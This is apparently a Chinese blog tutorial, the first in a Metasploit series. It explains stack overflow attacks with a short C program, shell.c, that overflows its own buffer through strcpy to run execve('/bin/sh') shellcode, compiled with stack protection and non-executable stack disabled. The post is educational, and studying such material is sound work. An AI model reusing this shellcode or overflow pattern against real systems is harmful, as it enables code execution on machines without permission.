使用metasploit进行栈溢出攻击-1
2014-11-22 09:35
204 查看
攻击是在bt5下面进行,目标程序是在ubuntu虚拟机上运行。
首先,需要搞明白什么是栈溢出攻击,详细内容请阅读
http://blog.csdn.net/cnctloveyu/article/details/4236212
这篇文章讲的很清楚了,只是具体例子不是很准确,有点小错误。
下面贴上一个我验证过的,修改过可执行的例子。
//shell.c
此程序使用gcc -fno-stack-protector -z execstack -g -o shell shell.c 编译
程序执行完毕以后应该新打开一个shell。
首先,需要搞明白什么是栈溢出攻击,详细内容请阅读
http://blog.csdn.net/cnctloveyu/article/details/4236212
这篇文章讲的很清楚了,只是具体例子不是很准确,有点小错误。
下面贴上一个我验证过的,修改过可执行的例子。
//shell.c
#include<unistd.h> char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; char large_string[128]; void main() { char buffer[96]; int i; long *long_ptr = (long *) large_string; for (i = 0; i < 32; i++) *(long_ptr + i) = (int) buffer; for (i = 0; i < strlen(shellcode); i++) large_string[i] = shellcode[i]; strcpy(buffer,large_string); }
此程序使用gcc -fno-stack-protector -z execstack -g -o shell shell.c 编译
程序执行完毕以后应该新打开一个shell。
相关文章推荐
- 使用metasploit进行栈溢出攻击-4
- 使用metasploit进行栈溢出攻击-5
- 使用metasploit进行栈溢出攻击-3
- 使用metasploit进行栈溢出攻击-2
- 使用MetaSploit在WinXP对Win2000进行攻击
- Linux使用ROP进行栈溢出攻击
- 使用metasploit进行渗透攻击步骤
- 使用metasploit-framework进行主机发现和端口扫描
- 使用 OpenSSL API 进行安全编程,第 2 部分: 安全握手--防止中间人(MITM)攻击
- MySQL数据库遭到攻击篡改(使用备份和binlog进行数据恢复)
- Metasploit使用问题记录及攻击测试代码
- Kali Linux进行内网攻击--》使用arpspoof
- Ubuntu10.04下使用metasploit对win2000 server进行MS06-040溢出
- 使用 OpenSSL API 进行安全编程,第 2 部分: 安全握手 防止中间人(MITM)攻击
- 内网中使用metasploit进行渗透测试
- 使用Metasploit进行端口扫描
- Ubuntu10.04下使用metasploit对win2000 server进行MS08-067溢出
- 使用metasploit(MSF)对windows的ms17-010漏洞进行利用的过程